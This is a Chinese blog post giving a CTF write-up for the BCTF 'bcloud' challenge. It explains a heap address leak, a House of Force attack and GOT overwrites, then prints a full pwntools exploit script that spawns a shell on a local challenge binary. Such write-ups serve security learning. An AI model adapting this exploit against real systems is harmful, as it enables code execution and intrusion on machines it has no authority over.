<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>BCTF--cloud | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00: 简介最近在复现一些优质CTF里的题目，所以这个系列的文章会有点多…先做了下BCTF的热身题目–bcloud，一个堆上的利用。  测试环境:ubuntu 16.04 x64">
<meta name="keywords" content="ctf writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="BCTF--cloud">
<meta property="og:url" content="http://o0xmuhe.me/2016/09/27/BCTF-cloud/index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="0x00: 简介最近在复现一些优质CTF里的题目，所以这个系列的文章会有点多…先做了下BCTF的热身题目–bcloud，一个堆上的利用。  测试环境:ubuntu 16.04 x64">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/ida_view.jpg">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/checksec.jpg">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/show_note.jpg">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/heap_addr_leak.jpg">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/hof.jpg">
<meta property="og:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/getshell.jpg">
<meta property="og:updated_time" content="2016-10-06T08:11:46.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BCTF--cloud">
<meta name="twitter:description" content="0x00: 简介最近在复现一些优质CTF里的题目，所以这个系列的文章会有点多…先做了下BCTF的热身题目–bcloud，一个堆上的利用。  测试环境:ubuntu 16.04 x64">
<meta name="twitter:image" content="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/ida_view.jpg">
  
    <link rel="alternate" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    
    <div id="header-inner" class="inner">
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://o0xmuhe.me"></form>
      </div>
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">首页</a>
        
          <a class="main-nav-link" href="/archives">归档</a>
        
          <a class="main-nav-link" href="/about">关于</a>
        
          <a class="main-nav-link" href="/frinds">友链</a>
        
          <a class="main-nav-link" href="/Pwnable-Log">Pwnable</a>
        
      </nav>
      
    </div>
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">o0xmuhe&#39;s blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">寻找大师，追随大师，成为大师，超越大师</a>
        </h2>
      
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-BCTF-cloud" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2016/09/27/BCTF-cloud/" class="article-date">
  <time datetime="2016-09-27T08:06:45.000Z" itemprop="datePublished">2016-09-27</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      BCTF--cloud
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- Table of Contents -->
        
        <h4 id="0x00-简介"><a href="#0x00-简介" class="headerlink" title="0x00: 简介"></a>0x00: 简介</h4><p>最近在复现一些优质CTF里的题目，所以这个系列的文章会有点多…先做了下BCTF的热身题目–bcloud，一个堆上的利用。</p>
<ul>
<li>测试环境:ubuntu 16.04 x64</li>
</ul>
<a id="more"></a>
<h4 id="0x01-程序分析"><a href="#0x01-程序分析" class="headerlink" title="0x01:程序分析"></a>0x01:程序分析</h4><p>程序是个菜单式的程序，看了下功能，应该就是堆上的一些利用了。<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/ida_view.jpg" alt=""><br>看下开启了什么保护。<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/checksec.jpg" alt=""></p>
<p>基本信息就是上面说的那样，下面是具体的分析：</p>
<ul>
<li>功能：每个笔记(chunk)的大小、内容、状态以数组形式存储在.bss段</li>
<li>问题：ban掉了show的操作，需要自己去构造下泄露了。<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/show_note.jpg" alt=""></li>
</ul>
<p>先开始看在进入菜单之前的函数:<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/heap_addr_leak.jpg" alt=""><br>这个函数读入用户名，没看到明显的溢出点，但是问题在于 unsafe_read() 函数，如果输入长度为0x40，那么就可以引发一个堆地址泄露，即在输出用户名的时候，输出一个堆地址。<br>    地址泄露 get!<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/hof.jpg" alt=""><br>下面是这个函数，读取host 和 org然后malloc分配空间，之后拷贝过去，由于使用的还是unsafe_read(),所以可以构造一个hof，这种利用需要堆地址，正好，之前有个泄露，这下就满足条件了。</p>
<h4 id="0x02-利用思路"><a href="#0x02-利用思路" class="headerlink" title="0x02:利用思路"></a>0x02:利用思路</h4><p>那么既然确定了是hof利用，利用的思路就出来了：</p>
<p>利用hof的思路，去分配到.bss上的 0x0804b0a0 地址<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">chunk_length[]   ----&gt; 0x0804b0a0</span><br><span class="line">...</span><br><span class="line">chunk_status[]</span><br><span class="line">...</span><br><span class="line">chunk_list[]     ----&gt; 0x0804B120</span><br></pre></td></tr></table></figure></p>
<p>分配到之后，利用edit功能去填入要改写的函数got，先构造一次泄露：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chunk_list[]中放：atoi@got,free@got,atoi@got</span><br></pre></td></tr></table></figure></p>
<p>然后修改free@got为printf函数地址，利用delete功能去泄露atoi地址。</p>
<ol>
<li>得到atoi()地址之后，利用libc.so确定system()和atoi()的偏移。</li>
<li>修改atoi()地址为system()，之后随便用下菜单的功能，发送一个/bin/sh\0过去就getshell了。</li>
</ol>
<h4 id="0x03-exploit"><a href="#0x03-exploit" class="headerlink" title="0x03:exploit"></a>0x03:exploit</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="comment"># by muhe</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">name_addr = <span class="number">0x0804B0CC</span></span><br><span class="line">bss_addr  = <span class="number">0x0804b0a0</span></span><br><span class="line">atoi = <span class="number">0x0804b03c</span></span><br><span class="line">free = <span class="number">0x0804b014</span></span><br><span class="line">printf_plt = <span class="number">0x080484D0</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">chunk_length[]   ----&gt; 0x0804b0a0</span></span><br><span class="line"><span class="string">chunk_status[]</span></span><br><span class="line"><span class="string">chunk_list[]     ----&gt; 0x0804B120</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">target = <span class="string">"./bcloud"</span></span><br><span class="line"><span class="comment">#target = ('127.0.0.1',10001)</span></span><br><span class="line">p = process(target)</span><br><span class="line"><span class="comment">#p = context(target)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">new_note</span><span class="params">(p,length,content)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'content:'</span>)</span><br><span class="line">    p.sendline(str(length))</span><br><span class="line">    p.recvuntil(<span class="string">'content:'</span>)</span><br><span class="line">    p.sendline(str(content))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit_note</span><span class="params">(p,index,new_content)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'id:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line">    p.recvuntil(<span class="string">'content:'</span>)</span><br><span class="line">    p.sendline(str(new_content))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete_note</span><span class="params">(p,index)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'4'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'id:'</span>)</span><br><span class="line">    p.sendline(str(index))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="comment"># leak heap address</span></span><br><span class="line">    name = <span class="string">"A"</span>*<span class="number">60</span>+<span class="string">"BBBB"</span></span><br><span class="line">    p.send(name)</span><br><span class="line">    p.recvuntil(<span class="string">'BBBB'</span>)</span><br><span class="line">    leak = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">    <span class="keyword">print</span> hex(leak)</span><br><span class="line">    <span class="comment"># hof here</span></span><br><span class="line">    usr_host = <span class="string">"B"</span>*<span class="number">0x40</span></span><br><span class="line">    fuck_top_chunk = <span class="string">"\xff\xff\xff\xff"</span></span><br><span class="line">    p.send(usr_host)</span><br><span class="line">    p.sendline(fuck_top_chunk)</span><br><span class="line">    <span class="comment"># get list_length chunk..</span></span><br><span class="line">    size = (bss_addr<span class="number">-0x8</span>)-leak<span class="number">-0x8</span> - <span class="number">208</span></span><br><span class="line">    new_note(p,size,<span class="string">'AAAA'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'option---&gt;&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'content:'</span>)</span><br><span class="line">    p.sendline(<span class="string">'172'</span>)</span><br><span class="line">    <span class="comment">#fill the list_length[] &amp;&amp; list_content[]</span></span><br><span class="line">    payload = p32(<span class="number">4</span>)</span><br><span class="line">    payload += p32(<span class="number">4</span>)</span><br><span class="line">    payload += p32(<span class="number">4</span>)</span><br><span class="line">    payload += p32(<span class="number">0</span>) * <span class="number">29</span></span><br><span class="line">    payload += p32(atoi)</span><br><span class="line">    payload += p32(free)</span><br><span class="line">    payload += p32(atoi)</span><br><span class="line">    payload += p32(<span class="number">0</span>) * <span class="number">8</span></span><br><span class="line">    p.send(payload)</span><br><span class="line">    <span class="comment"># change free() to printf()</span></span><br><span class="line">    raw_input(<span class="string">'$debug...'</span>)</span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.send(p32(printf_plt))</span><br><span class="line">    <span class="comment"># leak addr of atoi()</span></span><br><span class="line">    delete_note(p,<span class="number">0</span>)</span><br><span class="line">    garbage = p.recvuntil(<span class="string">"Input the id:\n"</span>)</span><br><span class="line">    leak_atoi = u32(p.recv(<span class="number">4</span>))</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"got atoi() ----&gt;"</span>+hex(leak_atoi)</span><br><span class="line">    <span class="comment"># get system() addr</span></span><br><span class="line">    system_addr = leak_atoi + <span class="number">0xd8f0</span></span><br><span class="line">    <span class="comment"># overwrite atoi() to system() &amp;&amp; getshell</span></span><br><span class="line">    p.sendline(<span class="string">'3'</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.send(p32(system_addr))</span><br><span class="line">    garbage = p.recv()</span><br><span class="line">    p.sendline(<span class="string">"/bin/sh\x00"</span>)</span><br><span class="line">    p.interactive()</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>getshell~~<br><img src="http://blogimg-10065924.cos.myqcloud.com/bcloud_wp/getshell.jpg" alt=""></p>
<p>0x04:参考<br><a href="http://uaf.io/exploitation/2016/03/20/BCTF-bcloud.html" target="_blank" rel="noopener">uaf.io</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://o0xmuhe.me/2016/09/27/BCTF-cloud/" data-id="cjpdln1nv00062r4ewsebh88g" class="article-share-link">分享</a>
      
        <a href="http://o0xmuhe.me/2016/09/27/BCTF-cloud/#ds-thread" class="article-comment-link">留言</a>
      
      
        <a href="http://o0xmuhe.me/2016/09/27/BCTF-cloud/#disqus_thread" class="article-comment-link">留言</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ctf-writeup/">ctf writeup</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2016/10/11/HITCON-2016-Quals-SecretHolder/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          HITCON-2016-Quals-SecretHolder
        
      </div>
    </a>
  
  
    <a href="/2016/09/24/一些环境配置遇到的坑-持续更新/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">一些环境配置遇到的坑(持续更新)</div>
    </a>
  
</nav>

  
</article>

      <div class="duoshuo">
	<!-- 多说评论框 start -->
	<div class="ds-thread" data-thread-key="2016/09/27/BCTF-cloud/" data-title="BCTF--cloud" data-url="http://o0xmuhe.me/2016/09/27/BCTF-cloud/"></div>
	<!-- 多说评论框 end -->
</div>


<section id="comments">
  <div id="disqus_thread">
    <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
  </div>
</section>

</section>
           
    <aside id="sidebar">
  
    

  
    
    <div class="widget-wrap">
    
      <div class="widget" id="toc-widget-fixed">
      
        <strong class="toc-title">文章目录</strong>
        <div class="toc-widget-list">
              <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#0x00-简介"><span class="toc-number">1.</span> <span class="toc-text">0x00: 简介</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x01-程序分析"><span class="toc-number">2.</span> <span class="toc-text">0x01:程序分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x02-利用思路"><span class="toc-number">3.</span> <span class="toc-text">0x02:利用思路</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#0x03-exploit"><span class="toc-number">4.</span> <span class="toc-text">0x03:exploit</span></a></li></ol>
          </div>
      </div>
    </div>

  
    

  
    
  
    
  
    


  
    

  
    

  
</aside>

      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-left">
      &copy; 2014 - 2018 muhe&nbsp;|&nbsp;
      主题 <a href="https://github.com/giscafer/hexo-theme-cafe/" target="_blank">Cafe</a>
    </div>
     <div id="footer-right">
      联系方式&nbsp;|&nbsp;o0xmuhe@gmail.com
    </div>
  </div>
</footer>
 <script src="/jquery/jquery.min.js"></script>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">首页</a>
  
    <a href="/archives" class="mobile-nav-link">归档</a>
  
    <a href="/about" class="mobile-nav-link">关于</a>
  
    <a href="/frinds" class="mobile-nav-link">友链</a>
  
    <a href="/Pwnable-Log" class="mobile-nav-link">Pwnable</a>
  
</nav>
    <img class="back-to-top-btn" src="/images/fly-to-top.png">
<script>
// Elevator script included on the page, already.
window.onload = function() {
  var elevator = new Elevator({
    selector:'.back-to-top-btn',
    element: document.querySelector('.back-to-top-btn'),
    duration: 1000 // milliseconds
  });
}
</script>
    
<script>
  var disqus_shortname = 'o0xmuhe';
  
  var disqus_url = 'http://o0xmuhe.me/2016/09/27/BCTF-cloud/';
  
  (function(){
    var dsq = document.createElement('script');
    dsq.type = 'text/javascript';
    dsq.async = true;
    dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
  })();
</script>



    	<script type="text/javascript">
        var duoshuoQuery = {short_name:"o0xmuhe"};
      </script>
      <script src="/duoshuo/embed.js"></script>


 <script src="/js/is.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>
<script src="/js/elevator.js"></script>
  </div>
</body>
</html>